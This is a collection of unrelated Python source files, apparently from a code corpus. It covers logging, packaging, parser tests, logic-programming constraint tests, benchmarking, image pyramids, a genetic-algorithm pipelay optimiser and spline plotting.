self._step_metrics elif self._within_epoch: self._commit_epoch_stop_time() metrics = self._epoch_metrics else: self._require_context() best_mark = ' (*)' if self._is_best_valid_metric else '' self.println(metrics.format_logs() + best_mark, with_tag=True) self._is_best_valid_metric = False # fire the metric stats printed events metric_stats = { key: val for key, val in six.iteritems(metrics.metrics) if not TIME_METRIC_PATTERN.match(key) } time_metric_stats = { key: val for key, val in six.iteritems(metrics.metrics) if TIME_METRIC_PATTERN.match(key) } if metric_stats: self.events.fire( EventKeys.METRIC_STATS_PRINTED, self, metric_stats) if time_metric_stats: self.events.fire( EventKeys.TIME_METRIC_STATS_PRINTED, self, time_metric_stats) metrics.clear()
439247
from pathlib import Path from setuptools import setup long_description = (Path(__file__).parent / "README.md").read_text('utf-8').split('# Installation')[0] setup( name="manga-ocr", version='0.1.7', description="OCR for Japanese manga", long_description=long_description, long_description_content_type="text/markdown", url="https://github.com/kha-white/manga-ocr", author="<NAME>", author_email="<EMAIL>", license="Apache License 2.0", classifiers=[ "Programming Language :: Python :: 3", ], packages=['manga_ocr'], include_package_data=True, install_requires=[ "fire", "fugashi", "jaconv", "loguru", "numpy", "Pillow", "pyperclip", "torch>=1.0", "transformers>=4.12.5", "unidic_lite", ], entry_points={ "console_scripts": [ "manga_ocr=manga_ocr.__main__:main", ] }, )
439291
from mau.visitors.html_visitor import HTMLVisitor from mau.parsers import nodes from mau.parsers.main_parser import MainParser from tests.helpers import ( dedent, remove_indentation, init_parser_factory, visitlist_factory, ) init_parser = init_parser_factory(MainParser) visitlist = visitlist_factory(HTMLVisitor) def test_footnote(): v = HTMLVisitor() result = v.visit( { "type": "footnote_ref", "number": 6, "refanchor": "refXYZ", "defanchor": "defXYZ", } ) assert result == '<sup>[<a id="refXYZ" href="#defXYZ">6</a>]</sup>' def test_footnote_definition(): v = HTMLVisitor() node = { "type": "footnote_def", "number": 1, "refanchor": "refXYZ", "defanchor": "defXYZ", "content": [ { "type": "sentence", "content": [ {"type": "text", "value": "Some text 1"}, ], } ], } v._visit_footnote_def(node) assert node == { "type": "footnote_def", "defanchor": "defXYZ", "number": 1, "refanchor": "refXYZ", "content": "Some text 1", } def test_footnotes(): v = HTMLVisitor() nodes = [ { "type": "footnote_def", "number": 1, "refanchor": "refXYZ1", "defanchor": "defXYZ1", "content": [ { "type": "sentence", "content": [ {"type": "text", "value": "Some text 1"}, ], } ], }, { "type": "footnote_def", "number": 2, "refanchor": "refXYZ2", "defanchor": "defXYZ2", "content": [ { "type": "sentence", "content": [ {"type": "text", "value": "Some text 2"}, ], } ], }, ] result = v._render( "footnotes", entries="".join([v.visit(i) for i in nodes]), ) assert result == remove_indentation( """ <div id="_footnotes"> <div id="defXYZ1"> <a href="#refXYZ1">1</a> Some text 1 </div> <div id="defXYZ2"> <a href="#refXYZ2">2</a> Some text 2 </div> </div> """ ) def test_command_footnotes(): footnotes = nodes.FootnotesNode( entries=[ nodes.FootnoteDefNode( 1, "refXYZ1", "defXYZ1", [nodes.SentenceNode([nodes.TextNode("Some text 1")])], ), nodes.FootnoteDefNode( 2, "refXYZ2", "defXYZ2", [nodes.SentenceNode([nodes.TextNode("Some text 2")])], ), ] ) parser = init_parser("::footnotes:") parser.parse() result = visitlist([node.asdict() for node in parser.nodes], footnotes=footnotes) assert result == [ remove_indentation( """ <div id="_footnotes"> <div id="defXYZ1"> <a href="#refXYZ1">1</a> Some text 1 </div> <div id="defXYZ2"> <a href="#refXYZ2">2</a> Some text 2 </div> </div> """ ) ] def test_footnotes_generation_without_footnote_definitions(): source = dedent( """ ::footnotes: """ ) parser = init_parser(source) parser.parse() result = visitlist( [node.asdict() for node in parser.nodes], footnotes=parser.footnotes ) assert result == ["""<div id="_footnotes"></div>"""]
439459
import sys import subprocess import argparse import os import signal from pathlib import Path parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter) parser.add_argument("arch", type=str, help="architecture (dgx1|dgx2)") parser.add_argument("--dir", type=str, help="output directory", default=".") parser.add_argument("--python", type=str, help="python interpreter", default="python3") args = parser.parse_args() if args.dir.endswith('/'): args.dir = args.dir[:-1] # args.arch has to be one of the following options types = ["dgx1", "dgx2"] assert(args.arch in types) base_path = str(Path(__file__).parent.parent.resolve()) # relevant plans for DGX-1 topology dgx1_plans = [ base_path + "/plans/dgx1_direct/all2all_plan.json", base_path + "/plans/dgx1_opt/all2all_plan.json", base_path + "/plans/dgx1_rings/all2all_plan.json" ] # relevant plans for DGX-2 topology dgx2_plans = [ base_path + "/plans/dgx2_direct/all2all_plan.json", base_path + "/plans/dgx2_opt/all2all_plan.json" ] plans = {"dgx1": dgx1_plans, "dgx2": dgx2_plans} # mkdir if not os.path.exists(args.dir): os.makedirs(args.dir) # make sure subprocesses return at SIGINT def signal_handler(signal, frame): sys.exit(0) signal.signal(signal.SIGINT, signal_handler) for i, plan in enumerate(plans[args.arch]): print("PROGRESS: plan " + str(i+1) + "/" + str(len(plans[args.arch]))) plan_label = plan.split('/')[-2] print("\tall2all") p1 = subprocess.Popen([args.python, base_path + "/benchmark/benchmark_plan.py", "all2all", plan, "-o", args.dir + "/" + plan_label + "_all2all.csv"]).wait() print("\tall2all_async") p2 = subprocess.Popen([args.python, base_path + "/benchmark/benchmark_plan.py", "all2all_async", plan, "-o", args.dir + "/" + plan_label + "_all2all_async.csv"]).wait() if p1 or p2: print("ERROR: subprocess terminated with non-zero exit code") sys.exit(1) subprocess.Popen([args.python, base_path + "/benchmark/plot_results.py", "-o", args.dir + "/" + args.arch + "_all2all_benchmark.pdf", args.dir + "/*"]).wait()
439500
from math import floor, log2 from typing import ( Any, Collection, Dict, Iterator, Optional, Sequence, Set, Tuple, Union, ) from pystiche import ComplexObject, loss from pystiche.misc import zip_equal from .level import PyramidLevel from .storage import ImageStorage __all__ = ["ImagePyramid", "OctaveImagePyramid"] class ImagePyramid(ComplexObject): r"""Image pyramid for a coarse-to-fine optimization on different levels. If iterated on yields :class:`~pystiche.pyramid.PyramidLevel` s and handles the resizing of all set images and guides of ``resize_targets``. Args: edge_sizes: Edge sizes for each level. num_steps: Number of steps for each level. If sequence of ``int`` its length has to match the length of ``edge_sizes``. edge: Corresponding edge to the edge size for each level. Can be ``"short"`` or ``"long"``. If sequence of ``str`` its length has to match the length of ``edge_sizes``. Defaults to ``"short"``. interpolation_mode: Interpolation mode used for the resizing of the images. Defaults to ``"bilinear"``. .. note:: For the resizing of guides ``"nearest"`` is used regardless of the ``interpolation_mode``. resize_targets: Targets for resizing of set images and guides during iteration. """ def __init__( self, edge_sizes: Sequence[int], num_steps: Union[Sequence[int], int], edge: Union[Sequence[str], str] = "short", interpolation_mode: str = "bilinear", resize_targets: Collection[loss.Loss] = (), ): self._levels = self.build_levels(edge_sizes, num_steps, edge) self.interpolation_mode = interpolation_mode self._resize_targets = set(resize_targets) @staticmethod def build_levels( edge_sizes: Sequence[int], num_steps: Union[Sequence[int], int], edge: Union[Sequence[str], str], ) -> Tuple[PyramidLevel, ...]: num_levels = len(edge_sizes) if isinstance(num_steps, int): num_steps = [num_steps] * num_levels if isinstance(edge, str): edge = [edge] * num_levels return tuple( PyramidLevel(edge_size, num_steps_, edge_) for edge_size, num_steps_, edge_ in zip_equal(edge_sizes, num_steps, edge) ) # TODO: can this be removed? def add_resize_target(self, loss: loss.Loss) -> None: self._resize_targets.add(loss) def __len__(self) -> int: return len(self._levels) def __getitem__(self, idx: int) -> PyramidLevel: return self._levels[idx] def __iter__(self) -> Iterator[PyramidLevel]: image_storage = ImageStorage(self._resize_losses()) for level in self._levels: try: self._resize(level) yield level finally: image_storage.restore() def _resize(self, level: PyramidLevel) -> None: for loss_ in self._resize_losses(): if isinstance(loss_, loss.ComparisonLoss): if loss_.target_image is not None: resized_image = level.resize_image( loss_.target_image, interpolation_mode=self.interpolation_mode ) resized_guide = ( level.resize_guide(loss_.target_guide) if loss_.target_guide is not None else None ) loss_.set_target_image(resized_image, guide=resized_guide) if loss_.input_guide is not None: resized_guide = level.resize_guide(loss_.input_guide) loss_.set_input_guide(resized_guide) def _resize_losses(self) -> Set[loss.Loss]: resize_losses = set() for target in self._resize_targets: if isinstance(target, loss.Loss): resize_losses.add(target) for loss_ in target._losses(): if not isinstance(loss_, loss.LossContainer): resize_losses.add(loss_) return resize_losses def _properties(self) -> Dict[str, Any]: dct = super()._properties() if self.interpolation_mode != "bilinear": dct["interpolation_mode"] = self.interpolation_mode return dct def _named_children(self) -> Iterator[Tuple[str, Any]]: yield from super()._named_children() for idx, level in enumerate(self._levels): yield str(idx), level class OctaveImagePyramid(ImagePyramid): r"""Image pyramid that comprises levels spaced by a factor of two. Args: max_edge_size: Maximum edge size. num_steps: Number of steps for each level. .. note:: If ``num_steps`` is specified as sequence of ``int``s, you should also specify ``num_levels`` to match the lengths num_levels: Optional number of levels. If ``None``, the number is determined by the number of steps of factor two between ``max_edge_size`` and ``min_edge_size``. min_edge_size: Minimum edge size for the automatic calculation of ``num_levels``. image_pyramid_kwargs: Additional options. See :class:`~pystiche.pyramid.ImagePyramid` for details. """ def __init__( self, max_edge_size: int, num_steps: Union[int, Sequence[int]], num_levels: Optional[int] = None, min_edge_size: int = 64, **image_pyramid_kwargs: Any, ) -> None: if num_levels is None: num_levels = int(floor(log2(max_edge_size / min_edge_size))) + 1 edge_sizes = [ round(max_edge_size / (2.0 ** ((num_levels - 1) - level))) for level in range(num_levels) ] super().__init__(edge_sizes, num_steps, **image_pyramid_kwargs)
439514
from itertools import permutations from cons import cons from pytest import raises from unification import reify, unify, var from unification.core import _reify, stream_eval from kanren import conde, eq, run from kanren.constraints import ( ConstrainedState, ConstrainedVar, DisequalityStore, isinstanceo, neq, typeo, ) from kanren.core import lconj from kanren.goals import membero def test_ConstrainedState(): a_lv, b_lv = var(), var() ks = ConstrainedState() assert repr(ks) == "ConstrainedState({}, {})" assert ks == {} assert {} == ks assert not ks == {a_lv: 1} assert not ks == ConstrainedState({a_lv: 1}) assert unify(1, 1, ks) is not None assert unify(1, 2, ks) is False assert unify(b_lv, a_lv, ks) assert unify(a_lv, b_lv, ks) assert unify(a_lv, b_lv, ks) # Now, try that with a constraint (that's never used). ks.constraints[DisequalityStore] = DisequalityStore({a_lv: {1}}) assert not ks == {a_lv: 1} assert not ks == ConstrainedState({a_lv: 1}) assert unify(1, 1, ks) is not None assert unify(1, 2, ks) is False assert unify(b_lv, a_lv, ks) assert unify(a_lv, b_lv, ks) assert unify(a_lv, b_lv, ks) ks = ConstrainedState( {a_lv: 1}, constraints={DisequalityStore: DisequalityStore({b_lv: {1}})} ) ks_2 = ks.copy() assert ks == ks_2 assert ks is not ks_2 assert ks.constraints is not ks_2.constraints assert ks.constraints[DisequalityStore] is not ks_2.constraints[DisequalityStore] assert ( ks.constraints[DisequalityStore].lvar_constraints[b_lv] == ks_2.constraints[DisequalityStore].lvar_constraints[b_lv] ) assert ( ks.constraints[DisequalityStore].lvar_constraints[b_lv] is not ks_2.constraints[DisequalityStore].lvar_constraints[b_lv] ) def test_reify(): var_a = var("a") ks = ConstrainedState() assert repr(ConstrainedVar(var_a, ks)) == "~a: {}" de = DisequalityStore({var_a: {1, 2}}) ks.constraints[DisequalityStore] = de assert repr(de) == "ConstraintStore(neq: {~a: {1, 2}})" assert de.constraints_str(var()) == "" assert repr(ConstrainedVar(var_a, ks)) == "~a: {neq {1, 2}}" # TODO: Make this work with `reify` when `var('a')` isn't in `ks`. assert isinstance(reify(var_a, ks), ConstrainedVar) assert repr(stream_eval(_reify(var_a, ks))) == "~a: {neq {1, 2}}" def test_ConstraintStore(): a_lv, b_lv = var(), var() assert DisequalityStore({a_lv: {1}}) == DisequalityStore({a_lv: {1}}) assert DisequalityStore({a_lv: {1}}) != DisequalityStore({a_lv: {1}, b_lv: {}}) assert a_lv in DisequalityStore({a_lv: {1}}) def test_ConstrainedVar(): a_lv = var() a_clv = ConstrainedVar(a_lv, ConstrainedState()) assert a_lv == a_clv assert a_clv == a_lv assert hash(a_lv) == hash(a_clv) assert a_lv in {a_clv} assert a_clv in {a_lv} def test_disequality_basic(): a_lv, b_lv = var(), var() ks = ConstrainedState() de = DisequalityStore({a_lv: {1}}) ks.constraints[DisequalityStore] = de assert unify(a_lv, 1, ks) is False ks = unify(a_lv, b_lv, ks) assert unify(b_lv, 1, ks) is False res = list(lconj(neq({}, 1))({})) assert len(res) == 1 res = list(lconj(neq(1, {}))({})) assert len(res) == 1 res = list(lconj(neq({}, {}))({})) assert len(res) == 0 res = list(lconj(neq(a_lv, 1))({})) assert len(res) == 1 assert isinstance(res[0], ConstrainedState) assert res[0].constraints[DisequalityStore].lvar_constraints[a_lv] == {1} res = list(lconj(neq(1, a_lv))({})) assert len(res) == 1 assert isinstance(res[0], ConstrainedState) assert res[0].constraints[DisequalityStore].lvar_constraints[a_lv] == {1} res = list(lconj(neq(a_lv, 1), neq(a_lv, 2), neq(a_lv, 1))({})) assert len(res) == 1 assert isinstance(res[0], ConstrainedState) assert res[0].constraints[DisequalityStore].lvar_constraints[a_lv] == {1, 2} res = list(lconj(neq(a_lv, 1), eq(a_lv, 2))({})) assert len(res) == 1 assert isinstance(res[0], ConstrainedState) # The constrained variable is already ground and satisfies the constraint, # so it should've been removed from the store assert a_lv not in res[0].constraints[DisequalityStore].lvar_constraints assert res[0][a_lv] == 2 res = list(lconj(eq(a_lv, 1), neq(a_lv, 1))({})) assert res == [] def test_disequality(): a_lv, b_lv = var(), var() q_lv, c_lv = var(), var() goal_sets = [ ([neq(a_lv, 1)], 1), ([neq(cons(1, a_lv), [1]), eq(a_lv, [])], 0), ([neq(cons(1, a_lv), [1]), eq(a_lv, b_lv), eq(b_lv, [])], 0), ([neq([1], cons(1, a_lv)), eq(a_lv, b_lv), eq(b_lv, [])], 0), # TODO FIXME: This one won't work due to an ambiguity in `cons`. # ( # [ # neq([1], cons(1, a_lv)), # eq(a_lv, b_lv), # # Both make `cons` produce a list # conde([eq(b_lv, None)], [eq(b_lv, [])]), # ], # 0, # ), ([neq(cons(1, a_lv), [1]), eq(a_lv, b_lv), eq(b_lv, tuple())], 1), ([neq([1], cons(1, a_lv)), eq(a_lv, b_lv), eq(b_lv, tuple())], 1), ( [ neq([1], cons(1, a_lv)), eq(a_lv, b_lv), # The first should fail, the second should succeed conde([eq(b_lv, [])], [eq(b_lv, tuple())]), ], 1, ), ([neq(a_lv, 1), eq(a_lv, 1)], 0), ([neq(a_lv, 1), eq(b_lv, 1), eq(a_lv, b_lv)], 0), ([neq(a_lv, 1), eq(b_lv, 1), eq(a_lv, b_lv)], 0), ([neq(a_lv, b_lv), eq(b_lv, c_lv), eq(c_lv, a_lv)], 0), ] for i, (goal, num_results) in enumerate(goal_sets): # The order of goals should not matter, so try them all for goal_ord in permutations(goal): res = list(lconj(*goal_ord)({})) assert len(res) == num_results, (i, goal_ord) res = list(lconj(*goal_ord)(ConstrainedState())) assert len(res) == num_results, (i, goal_ord) assert len(run(0, q_lv, *goal_ord)) == num_results, (i, goal_ord) def test_typeo_basic(): a_lv, q_lv = var(), var() assert run(0, q_lv, typeo(q_lv, int)) == (q_lv,) assert run(0, q_lv, typeo(1, int)) == (q_lv,) assert run(0, q_lv, typeo(1, str)) == () assert run(0, q_lv, typeo("hi", str)) == (q_lv,) assert run(0, q_lv, typeo([], q_lv)) == (q_lv,) # Invalid second arg type (i.e. not a type) assert run(0, q_lv, typeo(1, 1)) == () assert run(0, q_lv, membero(q_lv, (1, "cat", 2.2, "hat")), typeo(q_lv, str)) == ( "cat", "hat", ) with raises(ValueError): run(0, q_lv, typeo(a_lv, str), typeo(a_lv, int)) def test_typeo(): a_lv, b_lv, q_lv = var(), var(), var() goal_sets = [ # Logic variable instance type that's immediately ground in another # goal ([typeo(q_lv, int), eq(q_lv, 1)], (1,)), # Use an unhashable constrained term ([typeo(q_lv, list), eq(q_lv, [])], ([],)), # TODO: A constraint parameter that is never ground # ([typeo(a_lv, q_lv), eq(a_lv, 1)], (int,)), # A non-ground, non-logic variable instance argument that changes type # when ground ([typeo(cons(1, a_lv), list), eq(a_lv, [])], (q_lv,)), # Logic variable instance and type arguments ([typeo(q_lv, int), eq(b_lv, 1), eq(b_lv, q_lv)], (1,)), # The same, but with `conde` ( [ typeo(q_lv, int), # One succeeds, one fails conde([eq(b_lv, 1)], [eq(b_lv, "hi")]), eq(b_lv, q_lv), ], (1,), ), # Logic variable instance argument that's eventually grounded to a # mismatched instance type through another logic variable ([typeo(q_lv, int), eq(b_lv, 1.0), eq(b_lv, q_lv)], ()), # Logic variable type argument that's eventually grounded to a # mismatched instance type through another logic variable (i.e. both # arguments are ground to `int` types) ([typeo(q_lv, b_lv), eq(b_lv, int), eq(b_lv, q_lv)], ()), # Logic variable type argument that's eventually grounded to a # mismatched instance type through another logic variable (i.e. both # arguments are ground to the value `1`, which violates the second # argument type expectations) ([typeo(q_lv, b_lv), eq(b_lv, 1), eq(b_lv, q_lv)], ()), # Check a term that's unground by ground enough for this constraint ([typeo(a_lv, tuple), eq([(b_lv,)], a_lv)], ()), ] for i, (goal, expected) in enumerate(goal_sets): for goal_ord in permutations(goal): res = run(0, q_lv, *goal_ord) assert res == expected, (i, goal_ord) def test_instanceo_basic(): q_lv = var() assert run(0, q_lv, isinstanceo(q_lv, int)) == (q_lv,) assert run(0, q_lv, isinstanceo(1, int)) == (q_lv,) assert run(0, q_lv, isinstanceo(1, object)) == (q_lv,) # NOTE: Not currently supported. # assert run(0, q_lv, isinstanceo(1, (int, object))) == (q_lv,) assert run(0, q_lv, isinstanceo(1, str)) == () # NOTE: Not currently supported. # assert run(0, q_lv, isinstanceo(1, (str, list))) == () assert run(0, q_lv, isinstanceo("hi", str)) == (q_lv,) # Invalid second arg type (i.e. not a type) assert run(0, q_lv, isinstanceo(1, 1)) == () def test_instanceo(): b_lv, q_lv = var(), var() goal_sets = [ # Logic variable instance type that's immediately ground in another # goal ([isinstanceo(q_lv, list), eq(q_lv, [])], ([],)), # Logic variable in the type argument that's eventually unified with # a valid type for the given instance argument ([isinstanceo([], q_lv), eq(q_lv, list)], (list,)), # Logic variable type argument that's eventually reified to a tuple # containing a valid type for the instance argument # NOTE: Not currently supported. # ( # [isinstanceo([], q_lv), eq(q_lv, (int, b_lv)), eq(b_lv, list)], # ((int, list),), # ), # A non-ground, non-logic variable instance argument that changes type # when ground ([isinstanceo(cons(1, q_lv), list), eq(q_lv, [])], ([],)), # Logic variable instance argument that's eventually grounded through # another logic variable ([isinstanceo(q_lv, int), eq(b_lv, 1), eq(b_lv, q_lv)], (1,)), # The same, but with `conde` ( [ isinstanceo(q_lv, int), # One succeeds, one fails conde([eq(b_lv, 1)], [eq(b_lv, "hi")]), eq(b_lv, q_lv), ], (1,), ), # Logic variable instance argument that's eventually grounded to a # mismatched instance type through another logic variable ([isinstanceo(q_lv, int), eq(b_lv, 1.0), eq(b_lv, q_lv)], ()), # Logic variable type argument that's eventually grounded to a # mismatched instance type through another logic variable (i.e. both # arguments are ground to `int` types) ([isinstanceo(q_lv, b_lv), eq(b_lv, int), eq(b_lv, q_lv)], ()), # Logic variable type argument that's eventually grounded to a # mismatched instance type through another logic variable (i.e. both # arguments are ground to the value `1`, which violates the second # argument type expectations) ([isinstanceo(q_lv, b_lv), eq(b_lv, 1), eq(b_lv, q_lv)], ()), # Check a term that's unground by ground enough for this constraint ([isinstanceo(q_lv, tuple), eq([(b_lv,)], q_lv)], ()), ] for i, (goal, expected) in enumerate(goal_sets): for goal_ord in permutations(goal): res = run(0, q_lv, *goal_ord) assert res == expected, (i, goal_ord)
439561
from deap import base from deap import creator from deap import tools import random import numpy import matplotlib.pyplot as plt import seaborn as sns import elitism from static_pipelay import static_pipe_lay # thetaPT = 0...5 # Angle of inclination of firing line from horizontal, [deg] # LFL = 80...150 # Length of pipe on inclined firing line, [m] # RB = 100...250 # Radius of over-bend curve between stinger and straight section of firing line, [m] # ELPT = 5...15 # Height of Point of Tangent above Reference Point (sternpost at keel level),[m] # LPT = 5...20 # Horizontal distance between Point of Tangent and Reference Point, [m] # ELWL = 3...20 # Elevation of Water Level above Reference Point, [m] # LMP = 2...10 # Horizontal distance between Reference Point and Marriage Point, [m] # RS = 100...250 # Stinger radius, [m] # CL = 40...80 # Chord length of the stinger between the Marriage Point and the # # Lift-Off Point at the second from last roller , [m] BOUNDS_LOW = [0, 80, 100, 5, 5, 3, 2, 100, 40] BOUNDS_HIGH = [5, 150, 250, 15, 20, 20, 10, 250, 80] NUM_OF_PARAMS = len(BOUNDS_HIGH) # Genetic Algorithm constants: POPULATION_SIZE = 250 P_CROSSOVER = 0.9 # probability for crossover P_MUTATION = 0.5 # probability for mutating an individual MAX_GENERATIONS = 50 HALL_OF_FAME_SIZE = 5 CROWDING_FACTOR = 20.0 # crowding factor for crossover and mutation PENALTY_VALUE = 10.0 # fixed penalty for violating a constraint # set the random seed: RANDOM_SEED = 42 random.seed(RANDOM_SEED) toolbox = base.Toolbox() # define a single objective, minimizing fitness strategy: creator.create("FitnessMin", base.Fitness, weights=(-1.0,)) # create the Individual class based on list: creator.create("Individual", list, fitness=creator.FitnessMin) # define the hyperparameter attributes individually: for i in range(NUM_OF_PARAMS): # "hyperparameter_0", "hyperparameter_1", ... toolbox.register("hyperparameter_" + str(i), random.uniform, BOUNDS_LOW[i], BOUNDS_HIGH[i]) # create a tuple containing an attribute generator for each param searched: hyperparameters = () for i in range(NUM_OF_PARAMS): hyperparameters = hyperparameters + (toolbox.__getattribute__("hyperparameter_" + str(i)),) # create the individual operator to fill up an Individual instance: toolbox.register("individualCreator", tools.initCycle, creator.Individual, hyperparameters, n=1) # create the population operator to generate a list of individuals: toolbox.register("populationCreator", tools.initRepeat, list, toolbox.individualCreator) # fitness calculation def piplayStatic(individual): # Pipe data ODs = 323.9 # Outer diameter of steel pipe, [mm] ts = 14.2 # Wall thickness of steel pipe, [mm] Es = 207 # Young's modulus of steel, [GPa] SMYS = 358 # SMYS for X52 steel, [MPa] rho_s = 7850 # Density of steel,[kg⋅m^−3] tFBE = 0.5 # Thickness of FBE insulation layer, [mm] rhoFBE = 1300 # Density of FBE, [kg⋅m^−3] tconc = 50 # Thickness of concrete coating,[mm] rho_conc = 2250 # Density of concrete,[kg⋅m^−3] # Environmental data d = 50 # Water depth, [m] rho_sea = 1025 # Density of seawater,[kg⋅m^−3] # Pipe Launch Rollers mu_roller = 0.1 # Roller friction for pipe on stinger. # Lay-Barge Input Data thetaPT = individual[0] # Angle of inclination of firing line from horizontal, [deg] LFL = individual[1] # Length of pipe on inclined firing line, [m] RB = individual[2] # Radius of over-bend curve between stinger and straight section of firing line, [m] ELPT = individual[3] # Height of Point of Tangent above Reference Point (sternpost at keel level),[m] LPT = individual[4] # Horizontal distance between Point of Tangent and Reference Point, [m] ELWL = individual[5] # Elevation of Water Level above Reference Point, [m] LMP = individual[6] # Horizontal distance between Reference Point and Marriage Point, [m] RS = individual[7] # Stinger radius, [m] CL = individual[8] # Chord length of the stinger between the Marriage Point and the # Lift-Off Point at the second from last roller , [m] Ttens_tonnef, TTS_ratio, TopS_ratio = static_pipe_lay(ODs, ts, Es, SMYS, rho_s, tFBE, rhoFBE, tconc, rho_conc, d, rho_sea, mu_roller, thetaPT, LFL, RB, ELPT, LPT, ELWL, LMP, RS, CL) if numpy.isnan(Ttens_tonnef): Ttens_tonnef = 50 if TTS_ratio > 0.6 or TTS_ratio < 0.3 or TopS_ratio > 0.9: return Ttens_tonnef*PENALTY_VALUE, return Ttens_tonnef, toolbox.register("evaluate", piplayStatic) # genetic operators: toolbox.register("select", tools.selTournament, tournsize=2) toolbox.register("mate", tools.cxSimulatedBinaryBounded, low=BOUNDS_LOW, up=BOUNDS_HIGH, eta=CROWDING_FACTOR) toolbox.register("mutate", tools.mutPolynomialBounded, low=BOUNDS_LOW, up=BOUNDS_HIGH, eta=CROWDING_FACTOR, indpb=1.0 / NUM_OF_PARAMS) # Genetic Algorithm flow: def main(): # create initial population (generation 0): population = toolbox.populationCreator(n=POPULATION_SIZE) # prepare the statistics object: stats = tools.Statistics(lambda ind: ind.fitness.values) stats.register("min", numpy.min) stats.register("avg", numpy.mean) # define the hall-of-fame object: hof = tools.HallOfFame(HALL_OF_FAME_SIZE) # perform the Genetic Algorithm flow with hof feature added: population, logbook = elitism.eaSimpleWithElitism(population, toolbox, cxpb=P_CROSSOVER, mutpb=P_MUTATION, ngen=MAX_GENERATIONS, stats=stats, halloffame=hof, verbose=True) # print info for best solution found: best = hof.items[0] print("-- Best Individual = ", best) print("-- Best Fitness = ", best.fitness.values[0]) print() print("Double check: ") # Pipe data ODs = 323.9 # Outer diameter of steel pipe, [mm] ts = 14.2 # Wall thickness of steel pipe, [mm] Es = 207 # Young's modulus of steel, [GPa] SMYS = 358 # SMYS for X52 steel, [MPa] rho_s = 7850 # Density of steel,[kg⋅m^−3] tFBE = 0.5 # Thickness of FBE insulation layer, [mm] rhoFBE = 1300 # Density of FBE, [kg⋅m^−3] tconc = 50 # Thickness of concrete coating,[mm] rho_conc = 2250 # Density of concrete,[kg⋅m^−3] # Environmental data d = 50 # Water depth, [m] rho_sea = 1025 # Density of seawater,[kg⋅m^−3] # Pipe Launch Rollers mu_roller = 0.1 # Roller friction for pipe on stinger. # Lay-Barge Input Data thetaPT = best[0] # Angle of inclination of firing line from horizontal, [deg] LFL = best[1] # Length of pipe on inclined firing line, [m] RB = best[2] # Radius of over-bend curve between stinger and straight section of firing line, [m] ELPT = best[3] # Height of Point of Tangent above Reference Point (sternpost at keel level),[m] LPT = best[4] # Horizontal distance between Point of Tangent and Reference Point, [m] ELWL = best[5] # Elevation of Water Level above Reference Point, [m] LMP = best[6] # Horizontal distance between Reference Point and Marriage Point, [m] RS = best[7] # Stinger radius, [m] CL = best[8] # Chord length of the stinger between the Marriage Point and the # Lift-Off Point at the second from last roller , [m] Ttens_tonnef, TTS_ratio, TopS_ratio = static_pipe_lay(ODs, ts, Es, SMYS, rho_s, tFBE, rhoFBE, tconc, rho_conc, d, rho_sea, mu_roller, thetaPT, LFL, RB, ELPT, LPT, ELWL, LMP, RS, CL) print("Ttens_tonnef: ", Ttens_tonnef, ) print("TTS_ratio: ", TTS_ratio, " < 0.6") print("TopS_ratio: ", TopS_ratio, " < 0.9") # extract statistics: minFitnessValues, meanFitnessValues = logbook.select("min", "avg") # plot statistics: sns.set_style("whitegrid") plt.plot(minFitnessValues, color='red') plt.plot(meanFitnessValues, color='green') plt.xlabel('Generation') plt.ylabel('Min / Average Fitness') plt.title('Min and Average fitness over Generations') plt.savefig("gen.png") plt.show() if __name__ == "__main__": main()
439605
import os from model.MCFT import MCFT from model.SiameseStyle import SiameseStyle from model.VGGishEmbedding import VGGishEmbedding from data.TestDataset import TestDataset from data.OtoMobile import OtoMobile from log import get_logger logger = get_logger('factory') def model_factory(model_name, model_filepath): ''' Given a model name and weight file location, construct the model for query-by-voice search. Arguments: model_name: A string. The name of the model. model_filepath: A string. The location of the weight file on disk. Returns: A QueryByVoiceModel. ''' logger.debug('Attempting to load the {} model from {}'.format( model_name, model_filepath)) if model_name == 'mcft': model = MCFT(model_filepath) elif model_name == 'siamese-style': model = SiameseStyle(model_filepath) elif model_name == 'VGGish-embedding': model = VGGishEmbedding(model_filepath) else: raise ValueError('Model {} is not defined'.format(model_name)) logger.debug('Model loading complete') return model def dataset_factory( dataset_name, dataset_directory, representation_directory, construct_representation_batch_size, measure_similarity_batch_size, model): ''' Constructs a dataset object for query-by-voice search. Arguments: dataset_name: A string. The name of the dataset. dataset_directory: A string. The location of the audio files. representation_directory: A string. The location of the corresponding audio representations. construct_representation_batch_size: An integer or None. The maximum number of audio files to load during one batch of representation construction. measure_similarity_batch_size: An integer or None. The maximum number of representations to load during one batch of model inference. model: A QueryByVoiceModel. The model being used in the query-by-voice system. Defines the audio representation. Returns: A Dataset object. ''' logger.debug('Attempting to construct the {} dataset in {}. \ Representations will be stored in {}'.format( dataset_name, dataset_directory, representation_directory)) if dataset_name == 'test_dataset': dataset = TestDataset( dataset_directory, representation_directory, model, measure_similarity_batch_size, construct_representation_batch_size) elif dataset_name == 'otomobile': dataset = OtoMobile( dataset_directory, representation_directory, model, measure_similarity_batch_size, construct_representation_batch_size) else: raise ValueError('Dataset {} is not defined'.format(dataset_name)) logger.debug('Dataset construction complete.') return dataset
439619
class Solution: def maxSubArray(self, nums): sm, mn, mx = 0, 0, -float("inf") for num in nums: sm += num mx, mn = max(mx, sm - mn), min(mn, sm) return mx
439634
import numpy as np from scipy.interpolate import splev import matplotlib matplotlib.rcParams = matplotlib.rc_params_from_file('../../matplotlibrc') from matplotlib import pyplot as plt def basis_plot(n, k, res=401): """ Plots some b-spline basis functions. Uses same knot vector as the circle interpolation problem.""" # Make the knot vector. t = np.array([0]*(k) + range(n) + [n]*(k+1)) # Preallocate array to store the control points. c = np.zeros(t.size - k) # Parameter values to use for plot: T = np.linspace(0, n, res) # Plot each basis function. for i in xrange(t.size - k - 1): # Set the corresponding coefficient to 1. c[i] = 1 # plot it. plt.plot(T, splev(T, (t, c, k))) # Set the corresponding coefficient back to 0. c[i] = 0. # Save and clear the figure. plt.savefig("bspline_basis.pdf") plt.clf() if __name__ == "__main__": basis_plot(8, 3)
439730
from .gfpn import GFPN from .bricks import build_brick, build_bricks from .builder import build_decoder
439785
